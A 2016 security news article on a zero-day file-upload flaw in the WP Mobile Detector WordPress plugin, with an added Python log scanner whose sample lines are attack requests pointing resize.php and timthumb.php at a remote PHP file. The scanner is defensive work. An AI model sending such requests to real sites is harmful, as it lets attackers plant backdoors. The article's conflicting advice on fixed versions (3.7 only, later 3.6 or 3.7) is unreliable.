Wednesday, June 8, 2016

WordPress Websites Attacked Through New 0-Day in WP Mobile Detector Plugin

A security patch for the WordPress plugin WP Mobile Detector was issued on 2nd June, 2016, nearly a week after reports emerged of public attacks exploiting a zero-day flaw in it.

When the public attacks began, WP Mobile Detector was withdrawn from the WordPress Plugin Directory. On the 2nd it was reinstated, and users were advised to upgrade to version 3.7 without delay. The plugin's purpose is to detect whether a visitor to a WordPress website is using a smartphone so that a suitable theme can be served to the device.

Researchers at Plugin Vulnerabilities found a flaw in the plugin that, when exploited, allows an arbitrary file to be uploaded; the flaw lies in the plugin file "/wp-content/plugins/wp-mobile-detector/resize.php".

That file handles image uploads, and the researchers state that it performs no basic input filtering, which lets an attacker supply a malicious file that is then written into the plugin's /cache directory.

According to Plugin Vulnerabilities, exploiting the 0-day is harder than it might appear because it requires the PHP option allow_url_fopen to be enabled, which is not a default configuration.

In its advisory, Plugin Vulnerabilities said that because an enabled allow_url_fopen can lead to exactly this kind of problem, it appeared that most web-hosting services do not enable it. Threatpost.com reported this on June 3, 2016.

The vulnerability is extremely simple to exploit. An attacker only needs to make a single request to timthumb.php or resize.php in the plugin directory that contains a URL pointing at a backdoor.
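As an added defensive example (not from the original article or from the plugin's authors), the following Python script scans web-server access-log lines for requests to the plugin's resize.php or timthumb.php whose query string carries a remote URL, the request shape the article describes. The sample log lines, the RFC 5737 addresses and the `img` parameter name are constructed; the check itself does not depend on any parameter name.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Plugin directory and the two scripts named in the advisory as request targets.
PLUGIN_DIR = "/wp-content/plugins/wp-mobile-detector/"
TARGET_SCRIPTS = ("resize.php", "timthumb.php")

# Common log format: ip ident user [time] "METHOD path PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+)[^"]*" (\d{3}) \S+')
REMOTE_URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

def remote_url_in_request(request_path):
    """Return a remote URL passed to the plugin's image scripts, or None."""
    # No parameter name is assumed: any query value that is itself a remote URL
    # is the fetch-and-store pattern the advisory describes.
    parts = urlsplit(request_path)
    if not parts.path.startswith(PLUGIN_DIR):
        return None
    if parts.path.rsplit("/", 1)[-1] not in TARGET_SCRIPTS:
        return None
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value):
            return value
    return None

def scan_access_log(lines):
    """Return (client_ip, http_status, remote_url) for every matching line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        ip, _method, path, status = m.groups()
        url = remote_url_in_request(path)
        if url is not None:
            hits.append((ip, int(status), url))
    return hits

# Constructed sample lines (RFC 5737 documentation addresses); the `img`
# parameter name is made up for the sample and is not taken from the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Jun/2016:10:12:01 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?img=http://198.51.100.7/x.php HTTP/1.1" 200 512',
    '198.51.100.9 - - [03/Jun/2016:10:13:44 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?img=images/logo.png HTTP/1.1" 200 8123',
    '192.0.2.22 - - [03/Jun/2016:10:14:10 +0000] "GET /index.php?u=http://example.net/ HTTP/1.1" 200 2048',
    '203.0.113.5 - - [03/Jun/2016:10:15:02 +0000] "GET /wp-content/plugins/wp-mobile-detector/timthumb.php?img=HTTPS://198.51.100.7/b.txt HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, status, url in scan_access_log(SAMPLE_LOG):
        print(f"{ip} requested remote resource via plugin: {url} (status {status})")
```

Only the two plugin requests carrying a remote URL are reported; the local image path and the unrelated index.php request are ignored.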

Users of this plugin should remove it from their systems and replace it with a suitable alternative.

Now that the plugin's developers have fixed the problem and the plugin has been reinstated, users should update to either version 3.6 or 3.7, both of which are protected against attacks abusing the flaw.

The 0-day in WP Mobile Detector is exploitable regardless of which image-processing library the server has installed, so it has no connection to the ImageTragick security flaw.

» SPAMfighter News - 09-06-2016


Source: WordPress Websites Being Assaulted Through Fresh 0-Day within Plugin for WP Mobile Detector
